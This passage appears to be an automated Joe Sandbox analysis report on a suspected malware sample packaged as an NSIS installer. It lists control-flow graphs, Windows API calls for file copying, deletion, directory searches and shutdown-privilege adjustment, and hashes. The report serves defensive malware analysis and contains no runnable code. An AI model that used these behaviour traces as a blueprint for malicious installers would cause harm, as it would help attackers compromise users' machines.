                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\2CQ2zMn0hb.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\2CQ2zMn0hb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-323385493
                                                                                                              • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 162 4051c7-4051cf 152->162 163 405158-40515e 152->163 153->154 154->151 159 405089-40508c 155->159 160 4050fc-4050ff 155->160 156->152 156->155 195 404f33-404f39 157->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 157->196 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->152 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 194 4050ae-4050bf 168->194 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->152 182 405127-405131 174->182 175->174 183 4051f2-4051f9 176->183 184 4051eb-4051ec ImageList_Destroy 176->184 187 405371-405378 177->187 188 405221-40522d call 4011ef 177->188 180->172 189 405189-40519a SendMessageW 180->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->172 200 40537a-405381 187->200 214 40523d-405240 188->214 215 40522f-405232 188->215 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->152 191->152 192->177 193->192 194->160 203 4050c1-4050c3 194->203 204 404f3c-404f43 195->204 202 405011-405015 196->202 206 4051a7-4051c0 call 401299 SendMessageW 198->206 199->198 199->206 200->172 201 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->201 201->172 208 405017-40502a ShowWindow call 404394 202->208 209 40502f-405037 call 404394 202->209 210 4050c5-4050cc 203->210 211 4050d6 203->211 212 404fd9-404fec 204->212 213 404f49-404f71 204->213 206->162 208->172 209->140 222 4050d2-4050d4 210->222 223 4050ce-4050d0 210->223 226 4050d9-4050f5 call 40117d 211->226 212->204 217 404ff2-404ff6 212->217 224 404f73-404fa9 SendMessageW 213->224 225 404fab-404fad 213->225 218 405281-4052a5 call 4011ef 214->218 219 405242-40525b call 4012e2 call 401299 214->219 227 405234 215->227 228 405235-405238 call 404d9a 215->228 217->196 217->202 241 405347-40535b InvalidateRect 218->241 242 4052ab 218->242 249 40526b-40527a SendMessageW 219->249 250 40525d-405263 219->250 222->226 223->226 224->212 229 404fc0-404fd6 SendMessageW 225->229 230 404faf-404fbe SendMessageW 225->230 226->160 227->228 228->214 229->212 230->212 241->187 245 40535d-40536c call 404ced call 404cd5 241->245 243 4052ae-4052b9 242->243 246 4052bb-4052ca 243->246 247 40532f-405341 243->247 245->187 251 4052cc-4052d9 246->251 252 4052dd-4052e0 246->252 247->241 247->243 249->218 253 405265 250->253 254 405266-405269 250->254 251->252 256 4052e2-4052e5 252->256 257 4052e7-4052f0 252->257 253->254 254->249 254->250 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->247 260->259
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 587 405b72-405b73 call 405d09 581->587 588 405b65-405b70 lstrcatW 581->588 582->579 586 405c6b-405c6e 582->586 583->581 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->579 590->579 598 405c82-405c96 call 405cbd call 405ab2 590->598 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 604 405bdd-405bf1 call 4063e8 599->604 605 405bbf-405bc7 599->605 600->582 603 405c5f 600->603 603->582 616 405bf3-405bfb 604->616 617 405c08-405c13 call 405ab2 604->617 608 405bc9-405bd1 605->608 609 405c3c-405c4c FindNextFileW 605->609 608->604 610 405bd3-405bdb 608->610 609->599 613 405c52-405c53 FindClose 609->613 610->604 610->609 613->600 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->579 616->609 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->579 619->609 627->609 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->609 632->609
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-614058931
                                                                                                              • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 267 403eb5-403ec2 SetWindowPos 264->267 268 403ec8-403ecb 264->268 270 40408c-404091 call 4043ab 265->270 271 40404e-404051 265->271 266->265 267->268 273 403ee5-403eeb 268->273 274 403ecd-403edf ShowWindow 268->274 279 404096-4040b1 270->279 276 404053-40405e call 401389 271->276 277 404084-404086 271->277 280 403f07-403f0a 273->280 281 403eed-403f02 DestroyWindow 273->281 274->273 276->277 292 404060-40407f SendMessageW 276->292 277->270 278 40432c 277->278 286 40432e-404335 278->286 284 4040b3-4040b5 call 40140b 279->284 285 4040ba-4040c0 279->285 289 403f0c-403f18 SetWindowLongW 280->289 290 403f1d-403f23 280->290 287 404309-40430f 281->287 284->285 295 4040c6-4040d1 285->295 296 4042ea-404303 DestroyWindow EndDialog 285->296 287->278 294 404311-404317 287->294 289->286 297 403fc6-403fd4 call 4043c6 290->297 298 403f29-403f3a GetDlgItem 290->298 292->286 294->278 300 404319-404322 ShowWindow 294->300 295->296 301 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 295->301 296->287 297->286 302 403f59-403f5c 298->302 303 403f3c-403f53 SendMessageW IsWindowEnabled 298->303 300->278 331 404126-40412b 301->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 301->332 304 403f61-403f64 302->304 305 403f5e-403f5f 302->305 303->278 303->302 309 403f72-403f77 304->309 310 403f66-403f6c 304->310 308 403f8f-403f94 call 404338 305->308 308->297 312 403fad-403fc0 SendMessageW 309->312 314 403f79-403f7f 309->314 310->312 313 403f6e-403f70 310->313 312->297 313->308 317 403f81-403f87 call 40140b 314->317 318 403f96-403f9f call 40140b 314->318 329 403f8d 317->329 318->297 327 403fa1-403fab 318->327 327->329 329->308 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->279 351 4041ff-404201 340->351 351->279 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->287 356 404244-404271 CreateDialogParamW 353->356 354->278 355 404219-40421f 354->355 355->279 357 404225 355->357 356->287 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->287
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 3282139019-3251261122
                                                                                                              • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
